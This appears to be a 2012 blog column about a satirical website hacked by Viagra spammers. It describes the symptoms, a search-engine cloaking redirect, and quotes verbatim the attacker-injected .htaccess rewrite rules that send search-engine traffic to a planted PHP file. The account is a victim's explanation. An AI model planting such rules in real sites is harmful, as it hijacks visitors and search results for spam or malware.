Hacked and mangled -- yet again

April 05, 2012, 1:56 PM — The price of living on the InterWebs is that eventually you’re going to get hacked. And the longer you stay on the InterWebs, the more likely you’ll get hacked again. So it is with eSarcasm, the not-quite-award-winning satirical site I co-author with my partner in juvenility, JR Raphael.

A few weeks ago I was searching for something on eSarcasm and discovered that Google’s search results looked extremely disconcerting. The URLs were correct, but instead of the usual snarky headlines, two sentence excerpts, and page previews, Google had apparently substituted text like "Buy real viagra - Approved Online Pharmacy: always 10% off for all reorders, free samples for all orders, 100% quality, low prices, 24/7 support..."

It looked something like this:

When did eSarcasm become an online pharmacy, exactly? And if we are hawking bogus Viagra, shouldn’t we be making more money?

Clicking through the search results produced either an error message or a redirect to a pharmacy site, even though plugging the correct URL into the browser produced the page that was supposed to be there. The redirect only happened from within Google results. 

It turns out that some Viagra spammer/hackers did quite a number on us. For one thing, they gained access to our WordPress directories and uploaded several bogus PHP files. They also added the following bits of extra code to our .htaccess file:

RewriteEngine On

RewriteCond %{HTTP_USER_AGENT} (google|yahoo) [OR]

RewriteCond %{HTTP_REFERER} (google|aol|yahoo)

RewriteBase /

RewriteCond %{THE_REQUEST} /

RewriteCond %{REQUEST_URI} !/conf\.php

RewriteRule .+ cgi-bin/conf.php [L]

That’s what poleaxed our Google search results. Digging deeper, I turned up other folks who’d gotten nailed in similar ways, including a former tech reporter for the New York Times and the co-founder of one of the world’s most successful social networks. At least we were in good company.

Regular readers of TY4NS will remember this is the not the first time eSarcasm was hacked. Back in September 2010 the site fell victim to a vulnerability that allowed bad guys to serve up ‘malvertising’ – bogus ads that installed malware on visitors’ machines. The flaw was in OpenX, a plug in we used for rotating banner ads. OpenX had patched that hole shortly after it was discovered, but didn’t deign to notify us about the bug or the fix, so we got creamed.